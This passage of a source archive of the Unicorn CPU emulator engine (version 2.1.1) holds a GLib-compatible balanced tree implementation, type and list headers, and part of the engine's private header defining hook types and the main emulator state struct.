parent->left = next; else parent->right = next; } } /* restore balance */ if (balance) while (1) { GTreeNode *bparent = path[--idx]; //g_assert (!bparent || bparent->left == balance || bparent->right == balance); left_node = (bparent && balance == bparent->left); if(balance->balance < -1 || balance->balance > 1) { balance = g_tree_node_balance (balance); if (!bparent) tree->root = balance; else if (left_node) bparent->left = balance; else bparent->right = balance; } if (balance->balance != 0 || !bparent) break; if (left_node) bparent->balance += 1; else bparent->balance -= 1; balance = bparent; } if (!steal) { if (tree->key_destroy_func) tree->key_destroy_func (node->key); if (tree->value_destroy_func) tree->value_destroy_func (node->value); } g_slice_free (GTreeNode, node); tree->nnodes--; return TRUE; } /** * g_tree_lookup: * @tree: a #GTree * @key: the key to look up * * Gets the value corresponding to the given key. Since a #GTree is * automatically balanced as key/value pairs are added, key lookup * is O(log n) (where n is the number of key/value pairs in the tree). * * Returns: the value corresponding to the key, or %NULL * if the key was not found */ gpointer g_tree_lookup (GTree *tree, gconstpointer key) { GTreeNode *node; g_return_val_if_fail (tree != NULL, NULL); node = g_tree_find_node (tree, key); return node ? 
node->value : NULL; } /** * g_tree_lookup_extended: * @tree: a #GTree * @lookup_key: the key to look up * @orig_key: (out) (optional) (nullable): returns the original key * @value: (out) (optional) (nullable): returns the value associated with the key * * Looks up a key in the #GTree, returning the original key and the * associated value. This is useful if you need to free the memory * allocated for the original key, for example before calling * g_tree_remove(). * * Returns: %TRUE if the key was found in the #GTree */ gboolean g_tree_lookup_extended (GTree *tree, gconstpointer lookup_key, gpointer *orig_key, gpointer *value) { GTreeNode *node; g_return_val_if_fail (tree != NULL, FALSE); node = g_tree_find_node (tree, lookup_key); if (node) { if (orig_key) *orig_key = node->key; if (value) *value = node->value; return TRUE; } else return FALSE; } /** * g_tree_foreach: * @tree: a #GTree * @func: the function to call for each node visited. * If this function returns %TRUE, the traversal is stopped. * @user_data: user data to pass to the function * * Calls the given function for each of the key/value pairs in the #GTree. * The function is passed the key and value of each pair, and the given * @data parameter. The tree is traversed in sorted order. * * The tree may not be modified while iterating over it (you can't * add/remove items). To remove all items matching a predicate, you need * to add each item to a list in your #GTraverseFunc as you walk over * the tree, then walk the list and remove each item. */ void g_tree_foreach (GTree *tree, GTraverseFunc func, gpointer user_data) { GTreeNode *node; g_return_if_fail (tree != NULL); if (!tree->root) return; node = g_tree_first_node (tree); while (node) { if ((*func) (node->key, node->value, user_data)) break; node = g_tree_node_next (node); } } /** * g_tree_traverse: * @tree: a #GTree * @traverse_func: the function to call for each node visited. If this * function returns %TRUE, the traversal is stopped. * @traverse_type: the order in which nodes are visited, one of %G_IN_ORDER, * %G_PRE_ORDER and %G_POST_ORDER * @user_data: user data to pass to the function * * Calls the given function for each node in the #GTree. * * Deprecated:2.2: The order of a balanced tree is somewhat arbitrary. * If you just want to visit all nodes in sorted order, use * g_tree_foreach() instead. If you really need to visit nodes in * a different order, consider using an [n-ary tree][glib-N-ary-Trees]. */ /** * GTraverseFunc: * @key: a key of a #GTree node * @value: the value corresponding to the key * @data: user data passed to g_tree_traverse() * * Specifies the type of function passed to g_tree_traverse(). It is * passed the key and value of each node, together with the @user_data * parameter passed to g_tree_traverse(). If the function returns * %TRUE, the traversal is stopped. 
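 *
 * A minimal callback sketch (hypothetical caller code; @tree and
 * @needle are illustrative): stop walking once a given value is seen.
 * |[<!-- language="C" -->
 * static gboolean find_value (gpointer key, gpointer value, gpointer data)
 * {
 *     return value == data;
 * }
 *
 * g_tree_foreach (tree, find_value, needle);
 * ]|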
* * Returns: %TRUE to stop the traversal */ void g_tree_traverse (GTree *tree, GTraverseFunc traverse_func, GTraverseType traverse_type, gpointer user_data) { g_return_if_fail (tree != NULL); if (!tree->root) return; switch (traverse_type) { case G_PRE_ORDER: g_tree_node_pre_order (tree->root, traverse_func, user_data); break; case G_IN_ORDER: g_tree_node_in_order (tree->root, traverse_func, user_data); break; case G_POST_ORDER: g_tree_node_post_order (tree->root, traverse_func, user_data); break; case G_LEVEL_ORDER: //g_warning ("g_tree_traverse(): traverse type G_LEVEL_ORDER isn't implemented."); break; } } /** * g_tree_search: * @tree: a #GTree * @search_func: a function used to search the #GTree * @user_data: the data passed as the second argument to @search_func * * Searches a #GTree using @search_func. * * The @search_func is called with a pointer to the key of a key/value * pair in the tree, and the passed in @user_data. If @search_func returns * 0 for a key/value pair, then the corresponding value is returned as * the result of g_tree_search(). If @search_func returns -1, searching * will proceed among the key/value pairs that have a smaller key; if * @search_func returns 1, searching will proceed among the key/value * pairs that have a larger key. * * Returns: the value corresponding to the found key, or %NULL * if the key was not found */ gpointer g_tree_search (GTree *tree, GCompareFunc search_func, gconstpointer user_data) { g_return_val_if_fail (tree != NULL, NULL); if (tree->root) return g_tree_node_search (tree->root, search_func, user_data); else return NULL; } /** * g_tree_height: * @tree: a #GTree * * Gets the height of a #GTree. * * If the #GTree contains no nodes, the height is 0. * If the #GTree contains only one root node the height is 1. * If the root node has children the height is 2, etc. * * Returns: the height of @tree */ gint g_tree_height (GTree *tree) { GTreeNode *node; gint height; g_return_val_if_fail (tree != NULL, 0); if (!tree->root) return 0; height = 0; node = tree->root; while (1) { height += 1 + MAX(node->balance, 0); if (!node->left_child) return height; node = node->left; } } /** * g_tree_nnodes: * @tree: a #GTree * * Gets the number of nodes in a #GTree. 
* * Returns: the number of nodes in @tree */ gint g_tree_nnodes (GTree *tree) { g_return_val_if_fail (tree != NULL, 0); return tree->nnodes; } static GTreeNode *g_tree_node_balance (GTreeNode *node) { if (node->balance < -1) { if (node->left->balance > 0) node->left = g_tree_node_rotate_left (node->left); node = g_tree_node_rotate_right (node); } else if (node->balance > 1) { if (node->right->balance < 0) node->right = g_tree_node_rotate_right (node->right); node = g_tree_node_rotate_left (node); } return node; } static GTreeNode *g_tree_find_node (GTree *tree, gconstpointer key) { GTreeNode *node; gint cmp; node = tree->root; if (!node) return NULL; while (1) { cmp = tree->key_compare (key, node->key, tree->key_compare_data); if (cmp == 0) return node; else if (cmp < 0) { if (!node->left_child) return NULL; node = node->left; } else { if (!node->right_child) return NULL; node = node->right; } } } static gint g_tree_node_pre_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data) { if ((*traverse_func) (node->key, node->value, data)) return TRUE; if (node->left_child) { if (g_tree_node_pre_order (node->left, traverse_func, data)) return TRUE; } if (node->right_child) { if (g_tree_node_pre_order (node->right, traverse_func, data)) return TRUE; } return FALSE; } static gint g_tree_node_in_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data) { if (node->left_child) { if (g_tree_node_in_order (node->left, traverse_func, data)) return TRUE; } if ((*traverse_func) (node->key, node->value, data)) return TRUE; if (node->right_child) { if (g_tree_node_in_order (node->right, traverse_func, data)) return TRUE; } return FALSE; } static gint g_tree_node_post_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data) { if (node->left_child) { if (g_tree_node_post_order (node->left, traverse_func, data)) return TRUE; } if (node->right_child) { if (g_tree_node_post_order (node->right, traverse_func, data)) return TRUE; } if ((*traverse_func) (node->key, node->value, data)) return TRUE; return FALSE; } static gpointer g_tree_node_search (GTreeNode *node, GCompareFunc search_func, gconstpointer data) { gint dir; if (!node) return NULL; while (1) { dir = (* search_func) (node->key, data); if (dir == 0) return node->value; else if (dir < 0) { if (!node->left_child) return NULL; node = node->left; } else { if (!node->right_child) return NULL; node = node->right; } } } static GTreeNode *g_tree_node_rotate_left (GTreeNode *node) { GTreeNode *right; gint a_bal; gint b_bal; right = node->right; if (right->left_child) node->right = right->left; else { node->right_child = FALSE; right->left_child = TRUE; } right->left = node; a_bal = node->balance; b_bal = right->balance; if (b_bal <= 0) { if (a_bal >= 1) right->balance = b_bal - 1; else right->balance = a_bal + b_bal - 2; node->balance = a_bal - 1; } else { if (a_bal <= b_bal) right->balance = a_bal - 2; else right->balance = b_bal - 1; node->balance = a_bal - b_bal - 1; } return right; } static GTreeNode *g_tree_node_rotate_right (GTreeNode *node) { GTreeNode *left; gint a_bal; gint b_bal; left = node->left; if (left->right_child) node->left = left->right; else { node->left_child = FALSE; left->right_child = TRUE; } left->right = node; a_bal = node->balance; b_bal = left->balance; if (b_bal <= 0) { if (b_bal > a_bal) left->balance = b_bal + 1; else left->balance = a_bal + 2; node->balance = a_bal - b_bal + 1; } else { if (a_bal <= -1) left->balance = b_bal + 1; else left->balance = a_bal + b_bal + 2; node->balance = a_bal + 1; } 
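    /* At this point "left" is the new root of this subtree: the old root
     * ("node") has become its right child, and both balance factors were
     * recomputed above from the pre-rotation values a_bal and b_bal. */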
    return left;
}
unicorn-2.1.1/glib_compat/gtree.h
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000. See the AUTHORS
 * file for a list of people on the GLib Team. See the ChangeLog
 * files for a list of changes. These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
 */

#ifndef __G_TREE_H__
#define __G_TREE_H__

typedef struct _GTree GTree;

typedef gboolean (*GTraverseFunc) (gpointer key, gpointer value,
                                   gpointer data);

/* Balanced binary trees */
GTree *g_tree_new (GCompareFunc key_compare_func);
GTree *g_tree_new_full (GCompareDataFunc key_compare_func,
                        gpointer key_compare_data,
                        GDestroyNotify key_destroy_func,
                        GDestroyNotify value_destroy_func);
GTree *g_tree_ref (GTree *tree);
void g_tree_destroy (GTree *tree);
void g_tree_insert (GTree *tree, gpointer key, gpointer value);
void g_tree_remove_all (GTree *tree);
gboolean g_tree_remove (GTree *tree, gconstpointer key);
gpointer g_tree_lookup (GTree *tree, gconstpointer key);
void g_tree_foreach (GTree *tree, GTraverseFunc func, gpointer user_data);
gint g_tree_nnodes (GTree *tree);

#endif /* __G_TREE_H__ */
unicorn-2.1.1/glib_compat/gtypes.h
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000. See the AUTHORS
 * file for a list of people on the GLib Team. See the ChangeLog
 * files for a list of changes. These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
 */

#ifndef __G_TYPES_H__
#define __G_TYPES_H__

#include <stddef.h>
#include <stdint.h>
#include <float.h>

#ifndef TRUE
#define TRUE 1
#endif

#ifndef FALSE
#define FALSE 0
#endif

#define MAX(a, b) (((a) > (b)) ? (a) : (b))

/* typedefs for glib related types that may still be referenced */
typedef void *gpointer;
typedef const void *gconstpointer;
typedef int gint;
typedef uint8_t guint8;
typedef int8_t gint8;
typedef uint16_t guint16;
typedef int16_t gint16;
typedef uint32_t guint32;
typedef int32_t gint32;
typedef uint64_t guint64;
typedef int64_t gint64;
typedef unsigned int guint;
typedef char gchar;
typedef int gboolean;
typedef unsigned long gulong;
typedef unsigned long gsize;
typedef gint grefcount;
typedef volatile gint gatomicrefcount;

typedef void (*GDestroyNotify) (gpointer data);
typedef gint (*GCompareFunc) (gconstpointer a, gconstpointer b);
typedef gint (*GCompareDataFunc) (gconstpointer a, gconstpointer b,
                                  gpointer user_data);
typedef guint (*GHashFunc) (gconstpointer key);
typedef gboolean (*GEqualFunc) (gconstpointer a, gconstpointer b);
typedef void (*GHFunc) (gpointer key, gpointer value, gpointer user_data);
typedef gpointer (*GCopyFunc) (gconstpointer src, gpointer data);

#endif /* __G_TYPES_H__ */
unicorn-2.1.1/go.mod
module github.com/unicorn-engine/unicorn

go 1.17
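/* A minimal driver sketch for the list helper declared in
 * include/list.h just below (hypothetical caller code; the integers are
 * illustrative only, and per the header list_clear() leaves the data
 * itself untouched). */
#include "list.h"

static void drive_list(void)
{
    struct list *l = list_new();
    int a = 1, b = 2;

    list_append(l, &a);     // list is now: a
    list_insert(l, &b);     // insert at the head; list is now: b, a
    if (list_exists(l, &a))
        list_remove(l, &a); // list is now: b
    list_clear(l);          // drop the remaining nodes
}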
unicorn-2.1.1/include/
unicorn-2.1.1/include/list.h
#ifndef UC_LLIST_H
#define UC_LLIST_H

#include "unicorn/platform.h"

typedef void (*delete_fn)(void *data);

struct list_item {
    struct list_item *next;
    void *data;
};

struct list {
    struct list_item *head, *tail;
    delete_fn delete_fn;
};

// create a new list
struct list *list_new(void);

// remove the linked list nodes but do not free their content
void list_clear(struct list *list);

// insert a new item at the beginning of the list.
void *list_insert(struct list *list, void *data);

// append a new item at the end of the list.
void *list_append(struct list *list, void *data);

// returns true if entry was removed, false otherwise
bool list_remove(struct list *list, void *data);

// returns true if the data exists in the list
bool list_exists(struct list *list, void *data);

#endif
unicorn-2.1.1/include/qemu.h
/* By Dang Hoang Vu <dang.hvu -at- gmail.com>, 2015 */
/* Modified for Unicorn Engine by Chen Huitao <chenhuitao@hfmrit.com>, 2020 */

#ifndef UC_QEMU_H
#define UC_QEMU_H

struct uc_struct;

#define OPC_BUF_SIZE 640

#include "sysemu/sysemu.h"
#include "sysemu/cpus.h"
#include "exec/cpu-common.h"
#include "exec/memory.h"

#include "qemu/thread.h"
#include "hw/core/cpu.h"

#include "vl.h"

// This struct is originally from qemu/include/exec/ramblock.h.
// It is temporarily moved here because of a circular inclusion.
struct RAMBlock { struct MemoryRegion *mr; uint8_t *host; ram_addr_t offset; ram_addr_t used_length; ram_addr_t max_length; uint32_t flags; /* RCU-enabled, writes protected by the ramlist lock */ QLIST_ENTRY(RAMBlock) next; size_t page_size; }; typedef struct { MemoryRegion *mr; void *buffer; hwaddr addr; hwaddr len; } BounceBuffer; // This struct is originally from qemu/include/exec/ramlist.h typedef struct RAMList { bool freed; RAMBlock *mru_block; QLIST_HEAD(, RAMBlock) blocks; } RAMList; #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/uc_priv.h���������������������������������������������������������������������0000664�0000000�0000000�00000046704�14675241067�0016462�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_PRIV_H #define UC_PRIV_H #include "unicorn/platform.h" #include <stdio.h> #include "qemu.h" #include "qemu/xxhash.h" #include "unicorn/unicorn.h" #include "list.h" // The max recursive nested uc_emu_start levels #define UC_MAX_NESTED_LEVEL (64) // These are masks of supported modes for each cpu/arch. // They should be updated when changes are made to the uc_mode enum typedef. 
#define UC_MODE_ARM_MASK                                                       \
    (UC_MODE_ARM | UC_MODE_THUMB | UC_MODE_LITTLE_ENDIAN | UC_MODE_MCLASS |    \
     UC_MODE_ARM926 | UC_MODE_ARM946 | UC_MODE_ARM1176 | UC_MODE_BIG_ENDIAN |  \
     UC_MODE_ARMBE8)
#define UC_MODE_MIPS_MASK                                                      \
    (UC_MODE_MIPS32 | UC_MODE_MIPS64 | UC_MODE_LITTLE_ENDIAN |                 \
     UC_MODE_BIG_ENDIAN)
#define UC_MODE_X86_MASK                                                       \
    (UC_MODE_16 | UC_MODE_32 | UC_MODE_64 | UC_MODE_LITTLE_ENDIAN)
#define UC_MODE_PPC_MASK (UC_MODE_PPC32 | UC_MODE_PPC64 | UC_MODE_BIG_ENDIAN)
#define UC_MODE_SPARC_MASK                                                     \
    (UC_MODE_SPARC32 | UC_MODE_SPARC64 | UC_MODE_BIG_ENDIAN)
#define UC_MODE_M68K_MASK (UC_MODE_BIG_ENDIAN)
#define UC_MODE_RISCV_MASK                                                     \
    (UC_MODE_RISCV32 | UC_MODE_RISCV64 | UC_MODE_LITTLE_ENDIAN)
#define UC_MODE_S390X_MASK (UC_MODE_BIG_ENDIAN)
#define UC_MODE_TRICORE_MASK (UC_MODE_LITTLE_ENDIAN)

#define ARR_SIZE(a) (sizeof(a) / sizeof(a[0]))

#define READ_QWORD(x) ((uint64_t)x)
#define READ_DWORD(x) (x & 0xffffffff)
#define READ_WORD(x) (x & 0xffff)
#define READ_BYTE_H(x) ((x & 0xffff) >> 8)
#define READ_BYTE_L(x) (x & 0xff)
#define WRITE_DWORD(x, w) (x = (x & ~0xffffffffLL) | (w & 0xffffffff))
#define WRITE_WORD(x, w) (x = (x & ~0xffff) | (w & 0xffff))
#define WRITE_BYTE_H(x, b) (x = (x & ~0xff00) | ((b & 0xff) << 8))
#define WRITE_BYTE_L(x, b) (x = (x & ~0xff) | (b & 0xff))

struct TranslationBlock;

// Place the struct here since we need it in uc.c
typedef struct _mmio_cbs {
    uc_cb_mmio_read_t read;
    void *user_data_read;
    uc_cb_mmio_write_t write;
    void *user_data_write;
    MemoryRegionOps ops;
} mmio_cbs;

typedef uc_err (*query_t)(struct uc_struct *uc, uc_query_type type,
                          size_t *result);

typedef uc_err (*reg_read_t)(void *env, int mode, unsigned int regid,
                             void *value, size_t *size);
typedef uc_err (*reg_write_t)(void *env, int mode, unsigned int regid,
                              const void *value, size_t *size, int *setpc);

typedef struct {
    reg_read_t read;
    reg_write_t write;
} context_reg_rw_t;

typedef void (*reg_reset_t)(struct uc_struct *uc);

typedef bool (*uc_write_mem_t)(AddressSpace *as, hwaddr addr,
                               const uint8_t *buf, int len);

typedef bool (*uc_read_mem_t)(AddressSpace *as, hwaddr addr, uint8_t *buf,
                              int len);

typedef MemoryRegion *(*uc_mem_cow_t)(struct uc_struct *uc,
                                      MemoryRegion *current, hwaddr begin,
                                      size_t size);

typedef void (*uc_args_void_t)(void *);

typedef void (*uc_args_uc_t)(struct uc_struct *);
typedef void (*uc_args_int_uc_t)(struct uc_struct *);

typedef void (*uc_args_uc_long_t)(struct uc_struct *, uint32_t);

typedef void (*uc_args_uc_u64_t)(struct uc_struct *, uint64_t addr);

typedef uint64_t (*uc_get_pc_t)(struct uc_struct *);

typedef MemoryRegion *(*uc_args_uc_ram_size_t)(struct uc_struct *,
                                               hwaddr begin, size_t size,
                                               uint32_t perms);

typedef MemoryRegion *(*uc_args_uc_ram_size_ptr_t)(struct uc_struct *,
                                                   hwaddr begin, size_t size,
                                                   uint32_t perms, void *ptr);

typedef void (*uc_mem_unmap_t)(struct uc_struct *, MemoryRegion *mr);

typedef MemoryRegion *(*uc_memory_mapping_t)(struct uc_struct *, hwaddr addr);

typedef void (*uc_memory_filter_t)(MemoryRegion *, int32_t);

typedef void (*uc_readonly_mem_t)(MemoryRegion *mr, bool readonly);

typedef int (*uc_cpus_init)(struct uc_struct *, const char *);

typedef MemoryRegion *(*uc_memory_map_io_t)(
    struct uc_struct *uc, ram_addr_t begin, size_t size,
    uc_cb_mmio_read_t read_cb, uc_cb_mmio_write_t write_cb,
    void *user_data_read, void *user_data_write);
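/* Example (editor's sketch): how the READ_*/WRITE_* helpers above model
 * x86-style sub-register access on a wider register value. The values in
 * the comments follow directly from the macro definitions. */
static inline void subreg_access_demo(void)
{
    uint64_t reg = 0x1122334455667788ULL;

    uint32_t dword = READ_DWORD(reg); // 0x55667788, like EAX out of RAX
    uint16_t word = READ_WORD(reg);   // 0x7788, like AX
    uint8_t high = READ_BYTE_H(reg);  // 0x77, like AH
    uint8_t low = READ_BYTE_L(reg);   // 0x88, like AL

    WRITE_WORD(reg, 0xCAFE);  // reg == 0x112233445566CAFE
    WRITE_BYTE_H(reg, 0xAB);  // reg == 0x112233445566ABFE
    (void)dword;
    (void)word;
    (void)high;
    (void)low;
}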
// Which interrupt should make emulation stop?
typedef bool (*uc_args_int_t)(struct uc_struct *uc, int intno);

// validate if Unicorn supports hooking a given instruction
typedef bool (*uc_insn_hook_validate)(uint32_t insn_enum);

typedef bool (*uc_opcode_hook_validate_t)(uint32_t op, uint32_t flags);

// init target page
typedef void (*uc_target_page_init)(struct uc_struct *);

// soft float init
typedef void (*uc_softfloat_initialize)(void);

// tcg flush softmmu tlb
typedef void (*uc_tcg_flush_tlb)(struct uc_struct *uc);

// Invalidate the TB at a given address
typedef void (*uc_invalidate_tb_t)(struct uc_struct *uc, uint64_t start,
                                   size_t len);

// Request generating a TB at a given address
typedef uc_err (*uc_gen_tb_t)(struct uc_struct *uc, uint64_t pc,
                              uc_tb *out_tb);

// tb flush
typedef uc_tcg_flush_tlb uc_tb_flush_t;

typedef uc_err (*uc_set_tlb_t)(struct uc_struct *uc, int mode);

struct hook {
    int type;       // UC_HOOK_*
    int insn;       // instruction for HOOK_INSN
    int refs;       // reference count to free a hook stored in multiple lists
    int op;         // opcode for HOOK_TCG_OPCODE
    int op_flags;   // opcode flags for HOOK_TCG_OPCODE
    bool to_delete; // set to true when the hook is deleted by the user; the
                    // destruction of the hook is delayed
    uint64_t begin, end; // only trigger if PC or memory access is in this
                         // address range (depends on hook type)
    void *callback;      // a uc_cb_* type
    void *user_data;
    GHashTable *hooked_regions; // the regions this hook is instrumented on
};

// Add an inline hook to helper_table
typedef void (*uc_add_inline_hook_t)(struct uc_struct *uc, struct hook *hk,
                                     void **args, int args_len);

// Delete a hook from helper_table
typedef void (*uc_del_inline_hook_t)(struct uc_struct *uc, struct hook *hk);

// Return the size of a CPU context
typedef size_t (*uc_context_size_t)(struct uc_struct *uc);

// Generate a CPU context
typedef uc_err (*uc_context_save_t)(struct uc_struct *uc, uc_context *context);

// Restore a CPU context
typedef uc_err (*uc_context_restore_t)(struct uc_struct *uc,
                                       uc_context *context);

// hook list offsets
//
// The lowest 6 bits are used for the hook type index, while the others
// are used for hook flags.
//
// mirrors the order of uc_hook_type from include/unicorn/unicorn.h
typedef enum uc_hook_idx {
    UC_HOOK_INTR_IDX,
    UC_HOOK_INSN_IDX,
    UC_HOOK_CODE_IDX,
    UC_HOOK_BLOCK_IDX,
    UC_HOOK_MEM_READ_UNMAPPED_IDX,
    UC_HOOK_MEM_WRITE_UNMAPPED_IDX,
    UC_HOOK_MEM_FETCH_UNMAPPED_IDX,
    UC_HOOK_MEM_READ_PROT_IDX,
    UC_HOOK_MEM_WRITE_PROT_IDX,
    UC_HOOK_MEM_FETCH_PROT_IDX,
    UC_HOOK_MEM_READ_IDX,
    UC_HOOK_MEM_WRITE_IDX,
    UC_HOOK_MEM_FETCH_IDX,
    UC_HOOK_MEM_READ_AFTER_IDX,
    UC_HOOK_INSN_INVALID_IDX,
    UC_HOOK_EDGE_GENERATED_IDX,
    UC_HOOK_TCG_OPCODE_IDX,
    UC_HOOK_TLB_FILL_IDX,

    UC_HOOK_MAX,
} uc_hook_idx;

// Copy the essential information from TranslationBlock
#define UC_TB_COPY(uc_tb, tb)                                                  \
    do {                                                                       \
        (uc_tb)->pc = tb->pc;                                                  \
        (uc_tb)->icount = tb->icount;                                          \
        (uc_tb)->size = tb->size;                                              \
    } while (0)

// The lowest 6 bits are used for the hook type index.
#define UC_HOOK_IDX_MASK ((1 << 6) - 1)

// hook flags
#define UC_HOOK_FLAG_NO_STOP                                                   \
    (1 << 6) // Don't stop emulation in this uc_tracecode.

// The rest of the bits are reserved for hook flags.
#define UC_HOOK_FLAG_MASK (~(UC_HOOK_IDX_MASK))

#define HOOK_FOREACH_VAR_DECLARE struct list_item *cur

// for loop macro to loop over hook lists
#define HOOK_FOREACH(uc, hh, idx)                                              \
    for (cur = (uc)->hook[idx##_IDX].head;                                     \
         cur != NULL && ((hh) = (struct hook *)cur->data); cur = cur->next)

// if statement to check hook bounds
#define HOOK_BOUND_CHECK(hh, addr)                                             \
    ((((addr) >= (hh)->begin && (addr) <= (hh)->end) ||                        \
      (hh)->begin > (hh)->end) &&                                              \
     !((hh)->to_delete))

#define HOOK_EXISTS(uc, idx) ((uc)->hook[idx##_IDX].head != NULL)
#define HOOK_EXISTS_BOUNDED(uc, idx, addr)                                     \
    _hook_exists_bounded((uc)->hook[idx##_IDX].head, addr)

static inline bool _hook_exists_bounded(struct list_item *cur, uint64_t addr)
{
    while (cur != NULL) {
        if (HOOK_BOUND_CHECK((struct hook *)cur->data, addr))
            return true;
        cur = cur->next;
    }
    return false;
}
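/* Example (editor's sketch): how the HOOK_FOREACH/HOOK_BOUND_CHECK helpers
 * above are typically combined to dispatch UC_HOOK_CODE callbacks. The
 * dispatch itself is illustrative; the real one lives in uc.c and the
 * generated TCG helpers. uc_cb_hookcode_t is the public callback type from
 * unicorn.h. Note that begin > end marks a hook covering all addresses. */
static inline void dispatch_code_hooks_demo(uc_engine *uc, uint64_t address,
                                            uint32_t size)
{
    struct hook *hh;
    HOOK_FOREACH_VAR_DECLARE;

    HOOK_FOREACH(uc, hh, UC_HOOK_CODE)
    {
        if (HOOK_BOUND_CHECK(hh, address)) {
            ((uc_cb_hookcode_t)hh->callback)(uc, address, size,
                                             hh->user_data);
        }
    }
}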
// realloc increment, KEEP THIS A POWER OF 2!
#define MEM_BLOCK_INCR 32

typedef struct TargetPageBits TargetPageBits;
typedef struct TCGContext TCGContext;

struct uc_struct {
    uc_arch arch;
    uc_mode mode;
    uc_err errnum; // qemu/cpu-exec.c
    AddressSpace address_space_memory;
    AddressSpace address_space_io;
    query_t query;
    reg_read_t reg_read;
    reg_write_t reg_write;
    reg_reset_t reg_reset;

    uc_write_mem_t write_mem;
    uc_read_mem_t read_mem;
    uc_mem_cow_t memory_cow;
    uc_args_void_t release;  // release resource when uc_close()
    uc_args_uc_u64_t set_pc; // set PC for tracecode
    uc_get_pc_t get_pc;
    uc_args_int_t stop_interrupt; // check if the interrupt should stop
                                  // emulation
    uc_memory_map_io_t memory_map_io;

    uc_args_uc_t init_arch, cpu_exec_init_all;
    uc_args_int_uc_t vm_start;
    uc_args_uc_long_t tcg_exec_init;
    uc_args_uc_ram_size_t memory_map;
    uc_args_uc_ram_size_ptr_t memory_map_ptr;
    uc_memory_mapping_t memory_mapping;
    uc_memory_filter_t memory_filter_subregions;
    uc_mem_unmap_t memory_unmap;
    uc_mem_unmap_t memory_moveout;
    uc_mem_unmap_t memory_movein;
    uc_readonly_mem_t readonly_mem;
    uc_cpus_init cpus_init;
    uc_target_page_init target_page;
    uc_softfloat_initialize softfloat_initialize;
    uc_tcg_flush_tlb tcg_flush_tlb;
    uc_invalidate_tb_t uc_invalidate_tb;
    uc_gen_tb_t uc_gen_tb;
    uc_tb_flush_t tb_flush;
    uc_add_inline_hook_t add_inline_hook;
    uc_del_inline_hook_t del_inline_hook;

    uc_context_size_t context_size;
    uc_context_save_t context_save;
    uc_context_restore_t context_restore;

    /* only 1 cpu in unicorn; no need for current_cpu to track the currently
       running cpu. */
    CPUState *cpu;

    uc_insn_hook_validate insn_hook_validate;
    uc_opcode_hook_validate_t opcode_hook_invalidate;

    MemoryRegion *system_memory;    // qemu/exec.c
    MemoryRegion *system_io;        // qemu/exec.c
    MemoryRegion io_mem_unassigned; // qemu/exec.c
    RAMList ram_list;               // qemu/exec.c
    /* qemu/exec.c */
    unsigned int alloc_hint;
    /* qemu/exec-vary.c */
    TargetPageBits *init_target_page;
    int target_bits; // user-defined page bits set via uc_ctl
    int cpu_model;
    BounceBuffer bounce;                // qemu/cpu-exec.c
    volatile sig_atomic_t exit_request; // qemu/cpu-exec.c
    /* qemu/accel/tcg/cpu-exec-common.c */
    /* always true after tcg_exec_init() has been called. */
    bool tcg_allowed;
    /* This is a multi-level map on the virtual address space.
       The bottom level has pointers to PageDesc. */
    void **l1_map; // qemu/accel/tcg/translate-all.c
    size_t l1_map_size;
    /* qemu/accel/tcg/translate-all.c */
    int v_l1_size;
    int v_l1_shift;
    int v_l2_levels;
    /* code generation context */
    TCGContext *tcg_ctx;
    /* memory.c */
    QTAILQ_HEAD(memory_listeners, MemoryListener) memory_listeners;
    QTAILQ_HEAD(, AddressSpace) address_spaces;
    GHashTable *flat_views;
    bool memory_region_update_pending;

    uc_set_tlb_t set_tlb;

    // linked lists containing hooks per type
    struct list hook[UC_HOOK_MAX];
    struct list hooks_to_del;
    int hooks_count[UC_HOOK_MAX];

    // hook to count number of instructions for uc_emu_start()
    uc_hook count_hook;

    size_t emu_counter; // current counter of uc_emu_start()
    size_t emu_count;   // saved counter of uc_emu_start()

    int size_recur_mem; // size for mem access when in a recursive call

    bool init_tcg;       // already initialized local TCGv variables?
    bool stop_request;   // request to immediately stop emulation - for
                         // uc_emu_stop()
    bool quit_request;   // request to quit the current TB, but continue to
                         // emulate - for uc_mem_protect()
    bool emulation_done; // emulation is done by uc_emu_start()
    bool timed_out;      // emulation timed out; can be retrieved via
                         // uc_query(UC_QUERY_TIMEOUT)
    QemuThread timer;    // timer for emulation timeout
    uint64_t timeout;    // timeout for uc_emu_start()

    uint64_t invalid_addr; // invalid address to be accessed
    int invalid_error;     // invalid memory code: 1 = READ, 2 = WRITE,
                           // 3 = CODE

    int use_exits;
    uint64_t exits[UC_MAX_NESTED_LEVEL]; // when multiple exits is not enabled
    GTree *ctl_exits; // addresses where emulation stops (@until param of
